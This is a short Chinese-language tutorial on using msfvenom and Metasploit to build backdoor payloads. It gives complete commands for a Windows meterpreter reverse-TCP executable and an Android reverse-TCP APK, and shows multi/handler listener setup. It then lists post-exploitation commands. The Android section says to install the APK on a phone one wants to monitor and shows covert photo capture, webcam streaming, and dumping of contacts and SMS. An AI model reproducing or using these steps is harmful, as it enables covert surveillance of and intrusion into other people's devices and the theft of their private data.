簡介
msfvenom
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用來生成后門的軟件
查看所有--payload的模塊
msfvenom -l payloads
文件后綴名-f的格式
msfvenom --help-formats
metasploit
Metasploit Framework(MSF)是一款開源安全漏洞檢測工具,附帶數千個已知的軟件漏洞,並保持持續更新。Metasploit可以用來信息收集、漏洞探測、漏洞利用等滲透測試的全流程,被安全社區冠以“可以黑掉整個宇宙”之名。剛開始的Metasploit是采用Perl語言編寫的,但是再后來的新版中,改成了用Ruby語言編寫的了。在kali中,自帶了Metasploit工具。
生成的木馬是前端的話,那么這個就是后端
msfvenom的shell在windows中的使用
msfvenom生成shell.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=222.222.221.140 lport=1211 -f exe > /root/shell.exe
啟動metasploit
輸入命令:
msfconsole
metasploit偵聽
msf > use exploit/multi/handler #加載模塊 msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp #設置payload payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost kali的ip #設置kali的ip lhost => 192.168.152.131 msf exploit(multi/handler) > set lport 1211 #設置kali的端口 lport => 1211 msf exploit(multi/handler) > exploit #執行 [*] Started reverse TCP handler on 222.222.221.140:1211
將生成的shell上傳至windows主機中並運行
提示有返回即可控制對方電腦,如同操作linux服務器一樣
使用
? - 幫助菜單
download -下載文件/文件夾
msfvenom的apk在android中的使用
msfvenom生成shell.apk
ifconfig查看kali的ip,ip為222.222.221.140
輸入命令:
msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk
這里的5555是設置的端口,也可以自己更改,顯示這個說明已經生成成功 只有9K多大小
啟動metasploit
輸入命令:
msfconsole
啟動msfconsole
metasploit配置及監聽
在控制台中輸入
use exploit/multi/handler //加載模塊
set payload android/meterpreter/reverse_tcp //選擇Payload
show options //查看參數設置
這里需要設置LHOST的ip地址,也就是你的kali的ip地址
還有LPORT端口,剛才設置的為5555,也需要更改一下(剛才直接設置為4444也是可以的)
set LHOST 192.168.1.114 //這里的地址設置成我們剛才生成木馬的IP地址(kali的ip)
set LPORT 5555 //這里的端口設置成剛才我們生成木馬所監聽的端口
exploit //開始執行漏洞 開始監聽,等待手機上線
接下來就要把生成的apk裝在你想監控的手機上了,等待手機上線了
使用
然后可以輸入sysinfo 查看手機信息
webcam_list 查看手機有多少個攝像頭 這里顯示是2個
webcam_stream //開啟攝像頭
webcam_snap //隱秘拍照功能
dump_contacts //導出電話號碼
dump_sms //導出信息
導出的文件拍的照片都會在root下面
可以輸入?查看更多命令
session切換
background #后台運行當前session sessions #列出所有session sessions -i Id #選擇某一個sessionID進入session sessions -n Name -i Id #給session重命名
參考:https://blog.csdn.net/langtuteng17/article/details/80444115